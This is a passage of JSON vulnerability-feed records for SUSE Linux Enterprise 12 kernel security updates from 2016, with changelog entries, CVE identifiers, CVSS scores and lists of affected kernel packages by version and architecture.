range to 64TB (bsc#928138,fate#319026).\n - powerpc/mm: Make KERN_VIRT_SIZE not dependend on PGTABLE_RANGE\n (bsc#928138,fate#319026).\n - powerpc/mm: Make some of the PGTABLE_RANGE dependency explicit\n (bsc#928138,fate#319026).\n - powerpc/mm: Replace open coded CONTEXT_BITS value\n (bsc#928138,fate#319026).\n - powerpc/mm: Simplify hpte_decode (bsc#928138,fate#319026).\n - powerpc/mm: Update VSID allocation documentation\n (bsc#928138,fate#319026).\n - powerpc/mm: Use 32bit array for slb cache (bsc#928138,fate#319026).\n - powerpc/mm: Use hpt_va to compute virtual address\n (bsc#928138,fate#319026).\n - powerpc/mm: Use the required number of VSID bits in slbmte\n (bsc#928138,fate#319026).\n - powerpc: Move kdump default base address to half RMO size on 64bit\n (bsc#1003344).\n - powerpc: Remove altivec fix for gcc versions before 4.0 (bsc#967716).\n - powerpc: Remove buggy 9-year-old test for binutils &lt; 2.12.1 (bsc#967716).\n - powerpc: Rename USER_ESID_BITS* to ESID_BITS* (bsc#928138,fate#319026).\n - powerpc: Require gcc 4.0 on 64-bit (bsc#967716).\n - powerpc: Update kernel VSID range (bsc#928138,fate#319026).\n - ppp: defer netns reference release for ppp channel (bsc#980371).\n - qlcnic: fix a timeout loop (bsc#909350 FATE#317546)\n - random32: add prandom_u32_max (bsc#989152).\n - remove problematic preprocessor constructs (bsc#928138,fate#319026).\n - REVERT fs/cifs: fix wrongly prefixed path to root (bsc#963655,\n bsc#979681)\n - rpm/constraints.in: Bump x86 disk space requirement to 20GB Clamav tends\n to run out of space nowadays.\n - rpm/package-descriptions: add -bigmem description\n - s390/cio: fix accidental interrupt enabling during resume (bnc#1003677,\n LTC#147606).\n - s390/dasd: fix hanging device after clear subchannel (bnc#994436,\n LTC#144640).\n - s390/time: LPAR offset handling (bnc#1003677, LTC#146920).\n - s390/time: move PTFF definitions (bnc#1003677, LTC#146920).\n - sata: Adding Intel Lewisburg device IDs for SATA (fate#319286).\n - sched/core: Fix an SMP ordering race in try_to_wake_up() vs. schedule()\n (bnc#1001419).\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bnc#1002165).\n - sched: Fix possible divide by zero in avg_atom() calculation\n (bsc#996329).\n - scripts/bigmem-generate-ifdef-guard: auto-regen\n patches.suse/ppc64-bigmem-introduce-CONFIG_BIGMEM\n - scripts/bigmem-generate-ifdef-guard: Include this script to regenerate\n patches.suse/ppc64-bigmem-introduce-CONFIG_BIGMEM\n - scripts/bigmem-generate-ifdef-guard: make executable\n - scsi_dh_rdac: retry inquiry for UNIT ATTENTION (bsc#934760).\n - scsi: do not print 'reservation conflict' for TEST UNIT READY\n (bsc#984102).\n - scsi: ibmvfc: add FC Class 3 Error Recovery support (bsc#984992).\n - scsi: ibmvfc: Fix I/O hang when port is not mapped (bsc#971989)\n - scsi: ibmvfc: Set READ FCP_XFER_READY DISABLED bit in PRLI (bsc#984992).\n - scsi_scan: Send TEST UNIT READY to LUN0 before LUN scanning\n (bnc#843236,bsc#989779).\n - scsi: zfcp: spin_lock_irqsave() is not nestable (bsc#1003677,LTC#147374).\n - Set CONFIG_DEBUG_INFO=y and CONFIG_DEBUG_INFO_REDUCED=n on all platforms\n The specfile adjusts the config if necessary, but a new version of\n run_oldconfig.sh requires the settings to be present in the repository.\n - sfc: on MC reset, clear PIO buffer linkage in TXQs (bsc#909618\n FATE#317521).\n - sort hyperv patches properly in series.conf\n - sunrpc/cache: drop reference when sunrpc_cache_pipe_upcall() detects a\n race (bnc#803320).\n - tg3: Avoid NULL pointer dereference in tg3_io_error_detected()\n (bsc#908458 FATE#317507).\n - tmpfs: change final i_blocks BUG to WARNING (bsc#991923).\n - tty: Signal SIGHUP before hanging up ldisc (bnc#989764).\n - Update patches.xen/xen3-auto-arch-x86.diff (bsc#929141, a.o.).\n - usb: fix typo in wMaxPacketSize validation (bsc#991665).\n - usb: hub: Fix auto-remount of safely removed or ejected USB-3 devices\n (bsc#922634).\n - usb: hub: Fix unbalanced reference count/memory leak/deadlocks\n (bsc#968010).\n - usb: validate wMaxPacketValue entries in endpoint descriptors\n (bnc#991665).\n - vlan: do not deliver frames for unknown vlans to protocols (bsc#979514).\n - vlan: mask vlan prio bits (bsc#979514).\n - vmxnet3: Wake queue from reset work (bsc#999907).\n - x86, amd_nb: Clarify F15h, model 30h GART and L3 support (fate#321400).\n - x86/asm/traps: Disable tracing and kprobes in fixup_bad_iret and\n sync_regs (bsc#909077).\n - x86/cpu/amd: Set X86_FEATURE_EXTD_APICID for future processors\n (fate#321400).\n - x86/gart: Check for GART support before accessing GART registers\n (fate#321400).\n - x86/MCE/intel: Cleanup CMCI storm logic (bsc#929141).\n - xenbus: inspect the correct type in xenbus_dev_request_and_reply().\n - xen: x86/mm/pat, /dev/mem: Remove superfluous error message (bsc#974620).\n - xfs: Avoid grabbing ilock when file size is not changed (bsc#983535).\n - xfs: Silence warnings in xfs_vm_releasepage() (bnc#915183 bsc#987565).\n - zfcp: close window with unblocked rport during rport gone (bnc#1003677,\n LTC#144310).\n - zfcp: fix D_ID field with actual value on tracing SAN responses\n (bnc#1003677, LTC#144312).\n - zfcp: fix ELS/GS request&amp;response length for hardware data router\n (bnc#1003677, LTC#144308).\n - zfcp: fix payload trace length for SAN request&amp;response (bnc#1003677,\n LTC#144312).\n - zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace\n (bnc#1003677, LTC#144312).\n - zfcp: restore tracing of handle for port and LUN with HBA records\n (bnc#1003677, LTC#144312).\n - zfcp: retain trace level for SCSI and HBA FSF response records\n (bnc#1003677, LTC#144312).\n - zfcp: trace full payload of all SAN records (req,resp,iels)\n (bnc#1003677, LTC#144312).\n - zfcp: trace on request for open and close of WKA port (bnc#1003677,\n LTC#144312).\n\n", "reporter": "Suse", "published": "2016-12-02T16:14:43", "type": "suse", "title": "Security update for the Linux Kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-7117", "CVE-2016-6480", "CVE-2016-5696", "CVE-2016-7425", "CVE-2016-6828", "CVE-2015-7513", "CVE-2015-8956", "CVE-2013-4312", "CVE-2016-3841", "CVE-2016-0823", "CVE-2016-4998", "CVE-2016-7042"], "modified": "2016-12-02T16:14:43", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00002.html", "id": "SUSE-SU-2016:2976-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:33", "references": ["https://bugzilla.suse.com/981143", "https://bugzilla.suse.com/972124", "https://bugzilla.suse.com/986362", "https://bugzilla.suse.com/983394", "https://bugzilla.suse.com/971770"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.4", "arch": "noarch", "packageFilename": "kernel-docs-3.12.59-60.45.4.noarch.rpm", "packageName": "kernel-docs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.3", "arch": "x86_64", "packageFilename": "kernel-obs-build-3.12.59-60.45.3.x86_64.rpm", "packageName": "kernel-obs-build", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-base-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-ec2-debugsource-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-ec2-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "s390x", "packageFilename": "kernel-default-base-3.12.59-60.45.2.s390x.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-ec2-extra-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-ec2-extra-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "noarch", "packageFilename": "kernel-source-3.12.59-60.45.1.noarch.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-extra-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-base-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.3", "arch": "s390x", "packageFilename": "kernel-obs-build-debugsource-3.12.59-60.45.3.s390x.rpm", "packageName": "kernel-obs-build-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "s390x", "packageFilename": "kernel-default-debugsource-3.12.59-60.45.2.s390x.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-ec2-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-ec2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-ec2-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "x86_64", "packageFilename": "kernel-syms-3.12.59-60.45.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "ppc64le", "packageFilename": "kernel-syms-3.12.59-60.45.1.ppc64le.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.3", "arch": "s390x", "packageFilename": "kernel-obs-build-3.12.59-60.45.3.s390x.rpm", "packageName": "kernel-obs-build", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-debugsource-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-devel-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "ppc64le", "packageFilename": "kernel-default-devel-3.12.59-60.45.2.ppc64le.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "noarch", "packageFilename": "kernel-source-3.12.59-60.45.1.noarch.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "s390x", "packageFilename": "kernel-default-debuginfo-3.12.59-60.45.2.s390x.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-devel-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.3", "arch": "x86_64", "packageFilename": "kernel-obs-build-debugsource-3.12.59-60.45.3.x86_64.rpm", "packageName": "kernel-obs-build-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-ec2-devel-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-extra-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_59-60_45-default-1-2.3.x86_64.rpm", "packageName": "kgraft-patch-3_12_59-60_45-default-1", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-ec2-extra-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-ec2-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "x86_64", "packageFilename": "kernel-syms-3.12.59-60.45.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "ppc64le", "packageFilename": "kernel-default-debuginfo-3.12.59-60.45.2.ppc64le.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.3", "arch": "ppc64le", "packageFilename": "kernel-obs-build-3.12.59-60.45.3.ppc64le.rpm", "packageName": "kernel-obs-build", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_59-60_45-xen-1-2.3.x86_64.rpm", "packageName": "kgraft-patch-3_12_59-60_45-xen-1", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "ppc64le", "packageFilename": "kernel-default-base-debuginfo-3.12.59-60.45.2.ppc64le.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "s390x", "packageFilename": "kernel-default-base-debuginfo-3.12.59-60.45.2.s390x.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "noarch", "packageFilename": "kernel-devel-3.12.59-60.45.1.noarch.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "s390x", "packageFilename": "kernel-default-man-3.12.59-60.45.2.s390x.rpm", "packageName": "kernel-default-man", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-base-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "noarch", "packageFilename": "kernel-macros-3.12.59-60.45.1.noarch.rpm", "packageName": "kernel-macros", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-devel-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "s390x", "packageFilename": "kernel-syms-3.12.59-60.45.1.s390x.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-base-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "s390x", "packageFilename": "kernel-default-3.12.59-60.45.2.s390x.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "s390x", "packageFilename": "kernel-default-devel-3.12.59-60.45.2.s390x.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "noarch", "packageFilename": "kernel-devel-3.12.59-60.45.1.noarch.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "ppc64le", "packageFilename": "kernel-default-base-3.12.59-60.45.2.ppc64le.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.1", "arch": "noarch", "packageFilename": "kernel-macros-3.12.59-60.45.1.noarch.rpm", "packageName": "kernel-macros", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "ppc64le", "packageFilename": "kernel-default-debugsource-3.12.59-60.45.2.ppc64le.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.3", "arch": "ppc64le", "packageFilename": "kernel-obs-build-debugsource-3.12.59-60.45.3.ppc64le.rpm", "packageName": "kernel-obs-build-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-debugsource-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-xen-devel-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "ppc64le", "packageFilename": "kernel-default-3.12.59-60.45.2.ppc64le.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.59-60.45.2", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.12.59-60.45.2.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}], "description": "The SUSE Linux Enterprise 12 kernel was updated to receive critical\n security and bugfixes.\n\n Security issue fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\n\n The following non-security bugs were fixed:\n - KVM: x86: expose invariant tsc cpuid bit (v2) (bsc#971770).\n - block: do not check request size in blk_cloned_rq_check_limits()\n (bsc#972124).\n - rbd: handle OBJ_REQUEST_SG types for copyup (bsc#983394).\n - target/rbd: do not put snap_context twice (bsc#981143).\n - target/rbd: remove caw_mutex usage (bsc#981143).\n\n", "edition": 1, "reporter": "Suse", "published": "2016-06-30T21:07:43", "title": "Security update for the Linux Kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-06-30T21:07:43", "id": "SUSE-SU-2016:1709-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00060.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:29", "references": ["https://bugzilla.suse.com/986362"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "s390x", "packageFilename": "kernel-default-base-3.12.60-52.54.2.s390x.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "noarch", "packageFilename": "kernel-devel-3.12.60-52.54.1.noarch.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "3.12.60-52.54.3", "arch": "ppc64le", "packageFilename": "kernel-obs-build-debugsource-3.12.60-52.54.3.ppc64le.rpm", "packageName": "kernel-obs-build-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "3.12.60-52.54.3", "arch": "s390x", "packageFilename": "kernel-obs-build-3.12.60-52.54.3.s390x.rpm", "packageName": "kernel-obs-build", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-base-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "s390x", "packageFilename": "kernel-default-devel-3.12.60-52.54.2.s390x.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-ec2-extra-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-ec2-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "s390x", "packageFilename": "kernel-default-debuginfo-3.12.60-52.54.2.s390x.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-devel-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-ec2-debugsource-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-ec2-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "x86_64", "packageFilename": "kernel-syms-3.12.60-52.54.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "ppc64le", "packageFilename": "kernel-default-base-3.12.60-52.54.2.ppc64le.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "s390x", "packageFilename": "kernel-syms-3.12.60-52.54.1.s390x.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "ppc64le", "packageFilename": "kernel-default-debugsource-3.12.60-52.54.2.ppc64le.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-devel-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": 